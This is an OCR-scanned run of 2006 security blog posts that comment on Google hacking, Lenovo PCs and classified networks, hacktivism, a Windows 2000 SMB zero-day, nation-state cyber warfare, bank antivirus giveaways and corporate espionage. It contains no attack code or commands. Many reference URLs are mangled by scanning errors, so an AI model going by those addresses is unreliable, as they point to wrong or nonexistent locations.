Sciences Institute senior lecturer Dr Ellen Rose and graduate student Natalia Nehring recently 
completed a study into the topic." 


Not exactly a type of [3]cyberterrorism exercise such as the most recent [4]DigitalStorm, but 
it’s logical to conclude that if someone takes the time and effort to data mine the web, localize 
the attack like in this case, a lot will be revealed. In a recent article, CSOonline goes in-depth 
into the [5]security implications posed by Google. | once had a [6]chat with [7]JJohnny Long 
on many topics, among the "few", of course, was google hacking. He made a good point on 
saying that it’s whatever you actually do with the results that matters most, and how diverse 
is the threat - by googling your lights off for instance. 


What you should keep in mind is that it isn’t Google to blame, the way "[8]lmproving 
the Security of Your Site by Breaking Into it" provoked awareness, and not damage. Think the 
problem isn’t big of a shot - gather some intelligence by yourself through the [9]Google Hack 
Honeypot project. 
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. http://static.flickr.com/38/77978160_b165c9d377. jpg 


. http: //www.stuff.co.nz/stuff/0, 2106, 3676220a11,00.htm 
. http: //ddanchev.blogspot .com/2006/05/techno- imperialism-and-effect-of.htm 


. http: //www.washingtontechnology.com/news/1_1/daily_news/27877-1.htm 


. http: //www.csoonline.com/read/050106/google_security.htm 


. http: //www.astalavista.com/media/archivel/newsletter/issue_25_2006.pdf 


. bttp://johnny.ihackstuff .com/ 
. http: //nsi.org/Library/Compsec/farmer. txt 
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. http://ghh.sourceforge.net 


2.5.20 Espionage Ghosts Busters (2006-05-23 18:35) 


In previous posts, "[1]lnsider Competition in the Defense Industry", and "[2]The anti virus in- 
dustry’s panacea - a virus recovery button" , | gave examples of insider trading, of [3] malware 
infecting border-screening computers, or the plain truth on how U.S "manufactured" PCs are 
actually assembled in China these days. 


Obviously, plain old [4]paranoia without solid background still dominates as "Represen- 
tative Frank Wolf (R-VA) has announced that the State Department has agreed not to use 
900 computers purchased from Chinese-owned Lenovo on classified computer networks. The 
US-China Commission, a bipartisan congressional commission, raised concerns when State 
announced the purchase of 16,000 desktop computers from Lenovo, with 900 to be used on 
secret networks connected to the Defense Department's classified [5]SiPRnet (Secret Internet 
Protocol Router Network). State is changing its procurement process to better track changes 
in vendor ownership that could impact national security." 


There’s a common myth that a nation’s military uses a specially dedicated networks, 
ones greatly differing from the standart OSI model the way we know it - which is wrong as it 
would limit the usability, and increase the costs of operating. My point is that, even a PC sold 
by Dell would eventually run a Microsoft OS, thus exposing it to the monocultural insecurity by 
itself, and the [6]human weaknesses of the person operating the PC itself, not guarding the 
SIPRnet 


perimeter. 
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It would be easier for Chinese hackers or government entities to take advantage of client side 
attacks on any of these systems, then to ship them backdoor-ready risking too much in case 
of possible espionage fiasco. There have been known cases of malware leaking nuclear plant 
information, or [7]Jemployees P2Peering sensitive/classified information. Be it, [8]hardware 
keyloggers, [9]logic bombs, [10]BIOS rootkits, given the scrutiny, even a slight ambition might 
have vanished in the air. [11]Modern spy gadgets are evolving, [12]espionage cases are still 
happenning and some get even public, but in case you’re interested in the true [13]ghost 
covert operative - stay tuned for the Stand Alone Complex Novel! 


http: //ddanchev. blogspot .com/2006/05/insider-competition-in-defense.htm 


ttp://ddanchev. blogspot .com/2006/04/anti-virus- industrys-panacea-virus .htm 


. http: //www.wired.com/news/technology/0, 70642-0.htm 
. http: //www.gcn.com/online/voli_no1/40811-1.htm 
. http: //en.wikipedia.org/wiki/SIPRNet 


ttp://www.windowsecurity.com/articles/Reducing Human_Factor_Mistakes.htm 


_netp://wsv. theregisterco.uk/2006/05/47/ japan, power_plant_virus_leak/ 
| fep://awy.keyghost conf 

_http://en. wikipedia. ong/viki/Logic_bont 

10. http://www ngssoftware .com/jh_bhf2006. pdf 


11. http: //www.forbes.com/technology/2006/04/15/intelligence-spying-gadgets_cx_lh_O06slate_0418tools.html 
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12. http: //ddanchev.blogspot .com/2006/02/top-level-espionage-case-in-greece.htm 


13. http: //www.cyberpunkreview.com/graphic-novels/gits-stand-alone-complex-graphic-novel-may-24t 


2.5.21 Arabic Extremist Group Forum Messages’ Characteristics (2006-05-23 18:56) 


Ever wondered what’s the font size of a terrorist forum posting? These guys are really 
deep into using Al for gathering intelligence on various [1]Cyberterrorism threats, and as 
you can see they neatly [2]visualize their [3]findings. "[4]Applying Authorship Analysis to 
Extremist-Group Web Forum Messages" by Ahmed Abbasi and Hsinchun Chen, University of 
Arizona seem to have found a way, or at least patters of ongoing terrorist communication, and 
of course propaganda online. What they did was : 


"To explore these problems, we modified an existing framework for analyzing online au- 
thorship and applied it to Arabic and English Web forum messagesassociated with known 
extremist groups. We developed a special multilingual model—the set of algorithms and re- 
lated features—to identify Arabic messages, gearing this model toward the language's unique 
characteristics. Furthermore, we incorporated a complex message extraction component to 
allow the use of a more comprehensive set of features tailored specifically toward online 
messages. A series of experiments evaluating the models indicated a high level of success in 
identifying communication patterns." 
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[5]Social network analysis has a lot of potential, and with [6]data mining it seems to be the 
perfect match for the recent trouble with [7]NSA’s domestic spying program. [8]DearNSA.com 
and the [9]Patriot Search are aiming to solve the problem for both parties - efficiently. 


There’s a lot of propaganda chat going on online all the time, and among the very few 
limitations that bother me about such web aggregation of open source information are the 
use of steganography, or plain-simple Dark Web (closed for crawlers with basic/sophisticated 
authentication in place) communication - remember there’s a lot of noise to sort out through 
as well. 


1. http: //ddanchev. blogspot . com/2006/05/techno-imperialism-and-effect-of html 

2. http: //ddanchev. blogspot .com/2006/03/visualization-in-security-and-new.htm 

3. http: //ai arizona. edu/research/terror/publications/conf /SeminarGroupAuthorship pdf 
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5. http: //ddanchev. blogspot. com/2006/05/terrorist-social-network- analysis. html 


6. http: //ddanchev. blogspot. com/2006/03/data-mining-terrorism-and-security.htm 


7. bttp://en.wikipedia.org/wiki/NSA_warrantless_surveillance_controvers 


8. http: //www.dearnsa.com/ 
9. http: //ddanchev. blogspot .com/2006/01/still-worry-about-your-search-history.htm 


2.5.22 The Current, Emerging, and Future State of Hacktivism (2006-05-23 19:06) 


[1]Zone-H recently reported yet another major [2]hacktivism case in what’s stated to be [3]the 
biggest hacking incident in the web-hosting history- single hack, multiple targets exposed and 
their audiences’ attention "acquired". The very same type of tension happened several weeks 
ago due to the [4JMuhammad cartoons. It may seem questionable whether [5]Hacktivism 
would survive in today’s for-profit online crime world, but discussion and execution opens up 
new boundaries the way the author of this research did. 


| feel | went through what’s perhaps the most recent and extensive research done on 
Hacktivism, "[6]Hacktivism and the Future of Political Participation" by [7]Alexandra Samuel 
- a perfect moment to mention the [8]daily updated security resources, that | go through 
instantly, hudreds more will soon be shared as well! 
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The disertation "looks at the phenomenon of hacktivism: the marriage of political ac- 
tivism and computer hacking. It defines hacktivism as the nonviolent use of illegal or legally 
ambiguous digital tools in pursuit of political ends. Those tools include web site defacements, 
redirects, denial-of-service attacks, information theft, web site parodies, virtual sit-ins, virtual 
sabotage, and software development. The dissertation uses data from fifty-one interviews 
in conjunction with additional primary and secondary source material. This data is used to 
construct a taxonomy of hacktivism, and apply the taxonomy to three core issues in political 
participation." 


The big picture, the details, and everything in between, how fast can you print, bind 
and read this masterpiece? 


1 
2 

BE 

4 

5 

6. 

7. 

8. 


ttp://www.alexandrasamuel . com/20060510/now-available-hacktivism-the-future-of-political-participatio 


http: //www.alexandrasamuel .com/ 
ttp://del.icio.us/DDanchev/ 


2.5.23 Bedtime Reading - The Baby Business (2006-05-23 19:15) 


While not necessarily an [1]AI, a [2]Project 2501 type of living entity breakthrough develop- 
ment, there’s a growing (underground) market for genetically modified newborns, a scary 
scenario that reminds of previous [3]episodes (Criminal Nature) of [4]the Outer Limits and of 
course [5]Gattaca in all of its twisted beauty and utopian representation of Space as the "final 
destination". 


[6]The Baby Business [7]explains [8]how parents willing to pay to make their kids "bet- 
ter" are actually fueling growth in the market itself. What’s a "better" kid anyway? One that’s 
smart, beautiful, that thinks like an lvy League freshman when its 10 years old - is it thinking 
or theoritizing? - a math genious with a second life of a marketer? 
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Or intelligent, passionate about something eventually becoming a turning point for his 
future development, realizing admitting and getting over failure, being interested instead of 
being interesting type of kid, with a pure feeling of self-development and self-realization? - a 
soul. 


Would the "haves" donate genetic Know-how, or would one be eventually found and 
commercialized? | think utopias are a powerful driving force, yet perfection remains among 
the biggest human weaknesses ever - [9]superhuman is a state of mind if you are willing to 
embrace it. 


ttp://www.blogcharm.com/AI/ 
ttp://en.wikipedia.org/wiki/Project_2501 
ttp://www.theouterlimits.com/downloads/index.html?controlvoices 


1. 

2. 

3. 

4. http://ddanchev. blogspot . com/2006/02/dvd-of-weekend-outer-limits-sex-and.htm 

5, Beep //on.wikipedie.org/eixi/tattecd 

6. nvtp://snanazon.con/gp/preduct/1591996204/105-4696907-TSI06507v-ylanceln-255155 
7. ep:/ aww. .du/ne¥s/021606_ spar. 

8. 
9. 


ttp://www.genetics-and-society.org/newsdisp.asp?id=990 


ttp://en.wikipedia. org/wiki/Overma 


2.5.24 Travel Without Moving - Korean Demilitarized Zone (2006-05-27 19:51) 


[1]Continuing the [2]travel without moving series, the [3]Korean Demilitarized Zone remains 
a [4]hot spot with [5]North Korea publicly stating its ambtions of joining the nuclear club. 
How big of a threat is the statement anyway? | believe it’s a desperate move from the North 
Koreans’ side, while trying to put itself on the world’s map again - and the news of course. 


What they lost was the momentum, one that Iran greatly took advantage of. Think about it, as 
the U.S’s War on Terror is like any"product concept", it inevitably passes through introduction, 
growth, maturity and decline stages in respect to public relations. [6]Abu Ghraib’s offensive 
PSYOPS case, a national disaster in between, Muhammad's cartoons, and NSA’s fiasco seemed 
to further strenghten the momentum of announcing [7]their intentions without fear of having 
the U.S in their backyard - smart move fully taking advantage of the situation and definitely 
resulting in a future dimplomatic solution. 


While North Korea is presumably hoping to improve the nation’s dignity and reputation 
as scietifically sophisticated enough to be recognized, building nuclear weapons when the 
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central statistical bureau releases reports of people dying out of starvation reminds of the 
best Cold War strategy game scenario | ever played. 


No real army for the regime, but sneaky partisans everywhere, no roads, no buildings, 
but nuclear bombs and cruise missiles in every city, as well as income distribution model 
based on the "model of leftovers", thus, riots and lack of any production capabilities. | 
remember watching a documentary where a soldier was trying to broadcast over the border, 
and of course, North Korea’s jammers in action. Censoring news, obsessive self-regulation 
practices, total denial of problems, and keeping everyone in a twisted reality for as long as 
necessary is a daily practice - still, there are [8]capitalists trying to operate business ventures 
there. 


What the international community could possibly do is not to lose touch with these peo- 
ple, and constantly "ping" their diplomacy while trying to achieve bargain deals - the problem 
is that even Asian countries find North Korea a spooky place. [9]Kim Jong-il is not a mad 
man, but a man looking for attention, give him some without having him "envision" a 
[10]conventional weaponry phrase in his country’s history. 


1. http: //photos1.blogger.com/blogger/1933/1779/1600/North_Korea_Border. jpg 
2. http: //ddanchev. blogspot .com/2006/05/travel-without-moving-scratching-floor.htm 


3. http://en.wikipedia.org/wiki/Korean_Demilitarized_Zone 
4. ttp://maps. google. com/maps? f=qkhl=enkq=northtkorea+Joint+Securityt+Areakt=k&amp ; om=1&11=37 .956287 , 126.67 
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5. http: //en.wikipedia.org/wiki/North_Korea_nuclear_weapons_program 


6. http://yro.slashdot.org/article.pl?sid=04/11/07/144221 


7. bttp://en.wikipedia. org/wiki/Iran_and_weapons_of_mass_destructio 


8. http://www. forbes.com/business/global/2006/0227/046A .htm 
9. http://en.wikipedia.org/wiki/Kim_Jong_I 


10. http://news.google.com/news?hl=en&ned=uskq=northtkorea/2Bnuclearkie=UTF-8kscoring= 


2.5.25 Aha, a Backdoor! (2006-05-27 20:19) 


Security precautions can indeed blur the transparency of a company’s financial performance - 
one that’s extremely important in the post-Enron corporate world. Under fire over some of the 
biggest corporate scandals during the last decade, the Securities and Exchange Commission 
(SEC) has been trying to [1]change the data standards to ensure greater accountability and 
support decision makers. On the other hand, the U.S’s Intelligence Czar, John Negroponte 
remains in position to "exempt" publicly traded companies from reporting matters in relation 
to nothing else but national security. 
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From the [2]article : 


"Now, the White House’s top spymaster can cite national security to exempt businesses 
from reporting requirements President George W. Bush has bestowed on his intelligence 
czar, John Negroponte, broad authority, in the name of national security, to excuse publicly 
traded companies from their usual accounting and securities-disclosure obligations. Notice of 
the development came in a brief entry in the Federal Register, dated May 5, 2006, that was 
opaque to the untrained eye." 


What the U.S government gets is stimulated to [3]invest in homeland security publicly 
traded companies, given the benefits of the possible "exemption" and countless opportunities 
for profitable speculation. If the backdoor left gets used for purposes other than classifying 
some obvious defense contractors’ accounting histories | wouldn’t doubt seeing Coca Cola 
diversifying to take advantage of expanding the unaccountable R &D department. Moreover, 
today | came across to an independent research stating that [4]classified and unaccountable 
military spending is at its peak. 


It’s fascinating to label something as top secret and let the world know about it 30 years later 
in order to lose the public effect of the discovery, still "excusing" companies to fuel growth 
would open up a great deal for corporate fraud schemes, but yes, investments too. 


1. ftp: //waw. vnunet. con/ financial director /aualysis/DI60747/standard-iesud 
2, http: //manbc men, com/id/12952860/ 

3. http://w redherring. con/article_ aspi7a>i6925 

4, http:/ /wiv.realcities..con/nld/krvashington/14623081 ha 


2.5.26 Forgotten Security (2006-05-27 20:35) 
It’s one thing to [1]expose a Pengaton conference’s attendees list, and another Mr. Blair’s 


security plans intended to protect the Prime Minister from a terrorist attack during the Labour 
Party conference". 


From the [2]article : 
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"Security plans intended to protect the Prime Minister from a terrorist attack during the 
Labour Party conference have been left in a hotel. The documents include a list of ways 
in which Mr Blair and members of his Cabinet could be killed as they attend the five-day 
conference at Manchester’s G-Mex Centre in September. Greater Manchester Police said that 
the dossier, found at the Midland Hotel, had been left by a member of hotel staff but insisted 
that the plans were not secret." 


Every country has it’s reputable think tanks, whether representing PhDs’ with eyeglasses thick 
enough to have the sun burn their eyes, or plain simple analysts, worst case scenarios when 
protecting national leaders are among the top priorities. | think that even if the plans weren’t 
secret, they reveal a lot of info on the security agency’s thinking and hypotizing approach, 
still, no advantage could have been taken given the short timeframe - thankfully. 


1. http: //www.washingtonpost.com/wp-dyn/content/article/2006/05/09/AR2006050901725. htm 


2. http: //uk.news .yahoo.com/25052006/356/blair-s-secret-security-plans-found-hotel.htm 


2.5.27 Delaying Yesterday’s "Oday" Security Vulnerability (2006-05-27 20:47) 


[1] never imagined we would be waiting for the release of a "Oday" vulnerability, but | guess 
that’s what happens if you’re not a customer of an informediary in the growing [2]market 
for software vulnerabilities - growth in respect to, researchers, infomediaries and security 
vulnerabilities. Stay tuned for "[3]Exploit Of Windows 2000 Zero-day To Hit In June", and take 
your time to appreciate that it’s affecting "extended support" software. From the article : 


"Symantec warned its enterprise customers Thursday that an unpatched vulnerability in 
Windows 2000's file sharing protocol has surfaced, with details of an exploit expected to show 
next month. According to the Cupertino, Calif. company’s alert, an exploit for the zero-day 
bug in Windows 2000’s SMB (Server Message Block) protocol has been created by Immunity 
Security, the makers of the CANVAS exploit-creation platform. By Immunity researcher Dave 
Aitel’s account, the exploit leverages a flaw in the operating system’s kernel that can be 
triggered through SMB, and will give an attacker full access to the PC. Aitel claimed Immunity 
will make the exploit public in June. "Immunity is considered to be a reliable source and we 
are of the opinion that this information should be treated as fact," read Symantec’s warning. 
"An Official security update from Microsoft will likely not be in development until after June 
when the information is released." 


Well, how can they fix in such a way, even though their "sophisticated", quality-obsessed 
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[4]patch management practices. When working with vulnerabilities, or updating yourself with 
the dailypack of new ones, don’t live with the false feeling of their uniqueness, but try figuring 
out how to be a step ahead of the vulnerabilities management stage. If Microsoft requested 
from Immunity Security to look up for possible security vulnerabilities, gave them a deadline, 
and secured a commission in case a vulnerability is actually found, it would have perfectly 
fited in the scenario in a previous post "[5]Shaping the Market for Security Vulnerabilities 
Through Exploit Derivatives" - [6]reporting a vulnerability, let’s not mention web application 
vulnerability is for the brave these days. Moreover, "[7]Economic Analysis of the Market for 
Software Vulnerability Disclosure" quotes Arora et al. on the same issue from a vendor’s point 
of view : 


"developing an economic model to study a vendor’s decision of when to introduce its software 
and whether or not to patch vulnerabilities in its software. They compare the decision process 
of a social-welfare maximizing monopolistic vendot, to that of a [8]profit-maximizing monopo- 
listic vendor. Interestingly, they observe that the profit-maximizing vendor delivers a product 
that has fewer bugs, than a social-welfare maximizing vendor. Howver, the profit-maximizing 
vendor is less willing to patch its software than its social-welfare maximizing counterpart." - 
[9]The Price of Restricting Vulnerability Publications is indeed getting higher. 


Reactive, Proactive, or Adaptive - what’s your current [10]security strategy? 


. http://photos1. blogger .com/blogger/1933/1779/1600/exploited. jpg 
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. http: //papers.ssrn.com/sol3/papers.cfm?abstract_id=874846 


ttp://ddanchev. blogspot .com/2006/05/valuing-security-and-prioritizing-your.htm 


2.5.28 Who’s Who in Cyber Warfare? (2006-05-28 15:34) 


Wondering what’s the current state of cyber warfare capabilities of certain countries, | recently 
finished reading a report "[1]Cyber Warfare: An Analysis of the Means and Motivations of 
Selected Nation States", a very in-depth summary of Nation2Nation Cyber conflicts and 
developments | recommend you to read in case you’re interested. It covers China, India, Iran, 
North Korea, Pakistan, and, of course, Russia. Some selected brief excerpts on China, Iran, 
and Russia : 


449 


China 


"Beijing’s intelligence services continue to collect science and technology information to 
support the government’s goals, while Chinese industry gives priority to domestically manu- 
factured products to meet its technology needs. The PLA maintains close ties with its Russian 
counterpart, but there is significant evidence that Beijing seeks to develop its own unique 
model for waging cyber warfare." 


Iran 


"The armed forces and technical universities have joined in an effort to create indepen- 
dent cyber R & D centers and train personnel in IT skills; and second, Tehran actively seeks to 
buy IT and military related technical assistance and training from both Russia and India." 


Russia 


"Russia’s armed forces, collaborating with experts in the IT sector and academic com- 
munity, have developed a robust cyber warfare doctrine. The authors of Russia’s cyber 
warfare doctrine have disclosed discussions and debates concerning Moscow's Official policy. 
“Information weaponry,” i.e., weapons based on programming code, receives paramount 
attention in official cyber warfare doctrine." 


Technology as the next Revolution in Military Affairs (RMA) was inevitable development, 
what’s important to keep in mind is knowing who’s up to what, what are the foundations of 
their military thinking, as well as who’s copying attitude from who. Having the capacity to 
wage offensive and defense cyber warfare is getting more important, still, military thinkers of 
certain countries find [2]network centric warfare or total renovation of [3]C4I communications 
as the panacea when dealing with their about to get scraped conventional weaponry systems. 
Convergence represents countless opportunities for waging Cyber Warfare, offensive one as 
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well, as | doubt there isn’t a country working on defensive projects. 


In a previous post [4]Techno-Imperialism and the Effect of Cyberterrorism | also provided 
detailed overview of the concept and lots of real-life scenarios related to Cyberterrorism, an 
extension of Cyber warfare capabilities. It shouldn’t come as a surprise to you, that a nation’s 
military and intelligence personnel have, or seek to gain access to Oday security vulnerabilities, 
the currency of trade in today’s E-society as well as recruiting local "renegades". 


Undermining a nation’s confidence in its own abilities, the public’s perception of inevitable 
failure, sophisticated [5]PSYOPS, "excluded middle" [6]propaganda, it all comes down to 
who's a step ahead of the event by either predicting or intercepting its future occurrence. 
Information is not power, it’s noise turning into Knowledge, one that becomes power - if and 
when exercised. 


1. http://www.ists.dartmouth.edu/directors-office/cyberwarfare.pdf 


2. http: //www.vodium.com/MediapodLibrary/index.asp?library=dod_oft_incwkSessionArgs=0A1U0000000100000111 
3. http://en.wikipedia.org/wiki/Command, control, _and_communications 

4. http: //ddanchev. blogspot . com/2006/05/techno-imperialism-and-effect-of . html 
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6. heep://we.c}xorg/ssues/2006/5/schulman.asp 


2.5.29 No Anti Virus Software, No E-banking For You (2006-05-30 17:33) 


[1]Malware and [2]Phishing are the true enemies of E-commerce, its [3]future penetration, 
and [4]E-banking altogether. Still, there are often banks envisioning the very basic risks, and 
hedging them one way or another, as "[5]Barclays gives anti-virus software to customers" 


"Barclays Bank is issuing UK internet banking customers with anti-virus software, as part of 
attempts to reduce online identity theft. The bank has signed a deal with Finnish anti-virus 
firm F-Secure, which will provide software to the bank’s 1.6m UK internet banking customers. 
While other banks offer discounted anti-virus software deals to customers, Barclays is the 
first in the UK to give it away for free. ‘Nearly two-thirds of home PCs don’t have active virus 
protection, and one in five is actually infected by a virus, placing people at risk from data theft, 
as well as damage to their computers,’ said Barnaby Davis, director of electronic banking at 
Barclays." 
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| find the idea a very good mostly because compared to other banks that try to [6]reestablish 
the email communication with their customers, but starting from the basics, you can’t do 
E-banking without generally acceptable security measure in place. And while an [7]AV solution 
doesn’t necessarily mean the customer wouldn’t get attacked by other means, or that it would 
be actually active in the moment of the attack, this is a very smart to do. To take advantage 
of even more benefits, Barclays must actively communicate their contribution and unique 
differentiating point to their customers, in comparison with the other banks - it’s getting 
harder for companies to retain customers due to improved access to information, thus more 
informed decisions. 


You can’t just deal with the technological part of the problem, but avoid the human side 
in it, as education and awareness will result in less gullible, but more satisfied and longer 
retained customers. Phishing is today’s efficient social engineering, and a bank’s site shouldn’t 
be assumed "secure" as on many occasions site-specific vulnerabilities improve the truthful- 
ness of the scam itself. Forwarding the responsibility for secured access to the E-banking 
feature to final customers should be simultaneous with the bank auditing its web services. In 
the upcoming years, with the rise of [8]mobile banking, | think we will inevitably start seeing 
more mobile phishing attempts. 


Ebay’s PayPal is still a major player in online payments, on its way to dominate [9]mo- 
bile payments too. The trend and potential of [10]cross-platform malware is what both AV 
vendors and payment providers should keep in mind. 


1. http: //ddanchev. blogspot .com/2006/01/malware-future-trends.htm 


2. http: //ddanchev. blogspot .com/2006/03/anti-phishing-toolbars-can-you-trust.htm 
3. http: //ddanchev. blogspot .com/2006/01/hidden- internet- economy. htm 
. http: //ddanchev. blogspot .com/2006/01/security-threats-to-consider-when.htm 


ttp://www.computing.co.uk/computing/news/2157044/barclays-gives-anti-virus 


. http: //ddanchev. blogspot .com/2006/01/why-relying-on-virus-signatures-simply.htm 
ttp://upetd.up.ac.za/thesis/available/etd-07202004-111814/unrestricted/00dissertation. pdf 


. http: //www.paymentsnews .com/2006/04/paypal_releases.htm 


4 
5 
6. http: //ddanchev. blogspot .com/2006/04/heading-in-opposite-direction.htm 
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9 


. http: //www.computerworld.com/action/article.do?command=viewArticleBasickarticleId=11143 


2.5.30 Microsoft in the Information Security Market (2006-05-30 17:51) 


[1]Microsoft is emptying its pockets with tiny acquisitions of security solution providers with 
the idea to target the masses in its [2]all-in-one security service [3]OneCare. There’s nothing 
wrong with offering up to three licenses for $49.95 per year, at least not from a marketing 
point of view. [4]Microsoft’s Security Ambitions are getting huge "as it continues to reveal its 
security ambitions in very obvious ways. Its $75 million acquisition of SSL VPN vendor Whale 
Communications last week shows just how deep it wants to go against the established leaders 
of various security technologies. Already in Microsoft’s security sights are the antivirus and 
antispyware vendors. Since buying European antispyware vendor Giant Company Software 
and antivirus vendor Sybari, it was pretty clear that Microsoft intended to get into the malware 
protection market. Symantec, McAfee and Trend Micro seemed to be the clearest targets, but 
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so are Sophos, CA, F-Secure and scores more smaller vendors." 


Competition is always good for all parties involved. In another article on the topic, Web- 
Root’s founder, a leading anti-spyware solutions provider, gave [5]great comments about 
Microsoft’s take over of the infosec market : "The taking of a second-best product in this space 
is akin to locking half the doors in your house," he said. "Vista will not solve the spyware 
problem. It may change the vector of attack, but it will not solve this problem. And I'll bet the 
company on it." 


Microsoft really surprised me with their release of the [6]Strider Honey Monkeys Crawler, 
as precisely the type of in-house research that would act as a main differention point of its 
solutions. The problem has never been the technology, they still have some of the [7]brightest 
minds in the world working for them, but providing value and communicating the idea to the 
final customer. Security as a second priority isn’t tolerated by customers, and Microsoft is 
last company that the end user associates with security. Obsessed with perfection, and still 
living in the product marketing concept world, is outdated thinking, the way pushing features 
based on "what the sample says" is not going to hold the front any longer. Customers beg to 
participate! 


While for the time being Microsoft is rediscovering the Web, and working on Vista, money 
doesn’t necessarily buy innovation, prone to make impact individuals do -ones heading to 
[8]Mountain View, California where the real action is. 


1. http: //ddanchev. blogspot .com/2006/03/5-things-microsoft-can-do-to-secure. htm 


2. http://www.pcworld.com/reviews/article/0, aid, 125817,tk, soc_digg,pg,1,00.asp 


3 
4 
5. 
6. 
7. 

8. 


ttp://en.wikipedia.org/wiki/Mountain_View, Santa_Clara_County, California 


2.5.31 Covert Competitive Intelligence (2006-05-30 18:03) 


Yet another agreement on alleged [1]covert competitive intelligence, [2]this time, "West/et 
Airlines says it’s sorry that members of its management team covertly accessed a confidential 
Air Canada website, and has agreed pay $15.5 million. In a joint news release from the two 
carriers, West/et said that in 2003-2004, members of their management team "engaged in an 
extensive practice of covertly accessing a password protected proprietary employee website 
maintained by Air Canada to download detailed and commercially sensitive information 
without authorization or consent from Air Canada." 
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It’s worth noting that Air Canada was actually aware of the [3]security event, knew [4]when it 
happened, and managed to trace it back to their competitors. Today’s competitive intelligence 
does include unethical information gathering whether in-house, or "outsourced" practices, 
as [5]DDoS for hire still make the headlines, compared to the many other still undetected 
[6]linsider leakages years ago. It’s also impressive [7]how [8]Dumpster diving still remains a 
serious threat - so make sure you [9]shred your secrets! 


1. http: //ddanchev. blogspot .com/2006/05/insider-competition-in-defense.htm 


2. 
- http: //ddanchev. blogspot . com/2006/02/detecting- intruders and-where-to-look htm] 
http: //ddanchev. blogspot .com/2006/04/digital-forensics-efficient-data.htm 


. http://www. csoonline. com/read/050105/extortion. htm 


ttp://ddanchev. blogspot .com/2005/12/insiders-insights-trends-and-possible.htm 


. http: //www.crime-scene-investigator.net/DumpsterDiving. pdf 
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ttp://en.wikipedia.org/wiki/Dumpster_diving 


. http: //www.fellowes.com/tools/shreddershowcase/ 
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2.5.32 The Global Security Challenge - Bring Your Know-How (2006-05-30 18:16) 


It’s a public secret that the majority of innovative ideas come from either the academic 
enviroment, or plain simple entrepreneurial spirits. | find such annual competitions as a 
valuable incentive for both sides to unleash the full power of their ideas, or commercialize 
them - consciously or subconciously. [1]SpaceShipOne is a case study on how [2]Jelephants 
can’t dance, or at least how they dance on high profit margins only. 


Recently announced, [3]The Global Security Challenge seeks "..to help young startups 
succeed in the security field. Take advantage of this unique opportunity to get your ideas in 
front of investors, media, and government and industry leaders." And most importantly : 


"We seek to uncover the creative capabilities of innovators in universities and infant compa- 
nies that apply to public security needs. This includes software, hardware or other industrial 
solutions that help (a) protect people, critical infrastructure, facilities and data/electronic 
systems against terrorist or other criminal attacks and natural disasters or (b) help govern- 
ments, businesses and communities defend against, cope with or recover from such incidents. 
Examples of Technologies We Seek: 


- Mesh Networks 

- Data Storage and Recovery 
- Detection/ Sensors 

- Biometrics 


- Search Software 
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- Cyber/Network Security 

- Communications Interoperability & Reconstruction 
- Biological/Chemical/Radiological Remediation 

- Protective Equipment 

- RFID, Asset Tracking & Container Security 


- Biotechnology 


| bet [4]Europe’s Top Private Security Companies revenues’ exceed the limit of having 
less than £ 10 million in annual revenues, it’s worth speculating on their participation. Do your 
homework, know your competitors better than they do themselves,work out your elevator 
pitch, and disrupt. 


As far as acquisitions are concerned, [5]SiteAdvisor is the fist recently acquired startup 
that comes to my mind with its [6] $70M acquisition deal valuation. As it obviously goes 
beyond VC type of mentorship, to many this seemed as an overhyped deal. There’s no price 
for being a pioneer, but a price on acquiring the position - a stairway to heaven. Right now, 
a [7]vertical security market segment is slowly developing, and it is my humble opinion that 
the company’s pioneering position is poised for success. Another alternative to SiteAdvisor’s 
[8]safe search function is the [9]recently launched [10]Scandoo.com which actually integrates 
the results from Google and Yahoo - | doubt users would that easily change their search 
preferences though. 


Who's next to get acquired, or hopefully [11]funded? 


. http://en.wikipedia.org/wiki/SpaceShipOne 
. http: //www.amazon.com/gp/product/0060523794/103-2488219- 6696641? v=glance&n=28315 
. http://www.globalsecuritychallenge.com/ 


ttp://www.redherring.com/Article.aspx?a=15436khed=ToptPrivate+Security+Companies 


. http: //ddanchev. blogspot .com/2006/04/spotting-valuable-investments-in. html 


ttp://sunbeltblog. blogspot . com/2006/05/oh-and-while-were-on-subject-of .htm 


ttp://www.redherring.com/Article.aspx?a=17031khed=Melding+Searchtand+Security&sector=Industriesksubsecto 


=InternetAndServices 
. http: //www.siteadvisor.com/studies/search_safety_may2006 .htm 


ttp://home .businesswire.com/portal/site/google/index. jsp?ndmViewId=news_view&newsId=20060522005802&news 
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10. http://www.scandoo.com/ 
11. http://www.globalsecuritychallenge.com/enter/index.htm 
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2.5.33 Healthy Paranoia (2006-05-31 15:40) 


More developments on the US-China Commission’s decision not to use Chinese manufactured 
PCs on the SIRPnet follow, an event | covered in a previous post "[1]Espionage Ghosts Busters". 
The oficially stated [2]attack vector, namely that "..a significant portion" of Lenovo is owned 
by the Chinese Academy of Sciences, an arm of the Chinese government." is nothing more 
than a [3]healthy paranoia to me, one reaching to the skies on certain occassions, of course. 
Just came across to an [4]article summarizing some recent events : 


"The U.S. State Department recently declared that due to national security concerns, it 
would restrict use of the 16,000 computers it purchased to nonclassified work. It had originally 
planned to use 900 of the machines on a network connecting U.S. embassies. Lenovo's goal 
of becoming the “Sony of China” could be impeded by worries over its machines’ security, 
blocking its strategy to move out of its Asia stronghold and into the West by courting North 
American computer users and possibly listing on U.S. stock markets. That realization sparked 
outcry from officials of both the Chinese government and the computer company." 


However, today’s [5]monocultural reality, and favorable trend towards [6]diversity will 
have greater impact on the (in) security of the PCs. Moreover, the "manufactured in China" 
reality is a commonly shared myth, one that keeps getting debunked as well : 


"Almost any PC you can name has Chinese content,” said Roger Kay, president of the 
research firm Endpoint Technologies Associates. He pointed to Intel semiconductors and Sea- 
gate hard drives made in China. He also noted that 80 percent of notebooks sold worldwide 
are manufactured in China." 


Even if Lenovo dared to implement hardware backdoors, or ship the PCs rootkit ready, it 
could have successfully ruined its business future - [7]insider pressure is always an option, 
but what do you got besides speculation? Don’t unload China Communist Party’s load on this 
recently separated from IBM devision, they aren’t in the most favorable position, still remain 
among the top players on the PC market, right next to the efficiency machine Dell, which as a 
matter of fact recently completed its [8]second high-tech factory in China. 


Healthy paranoia, or the George Orwell inside you? Comic page text generated at 
[9]Gaxed.com 


1. http: //ddanchev. blogspot .com/2006/05/espionage-ghosts- busters. htm 
2. http: //www.msnbc .msn.com/id/12861245/ 
3. http: //www.fas.org/irp/congress/2005_hr/hhrg109-58 .htm1 


4. http: //redherring.com/Article.aspx?a=17039%hed=Lenovo/2c+Chinese+Lash+0ut 
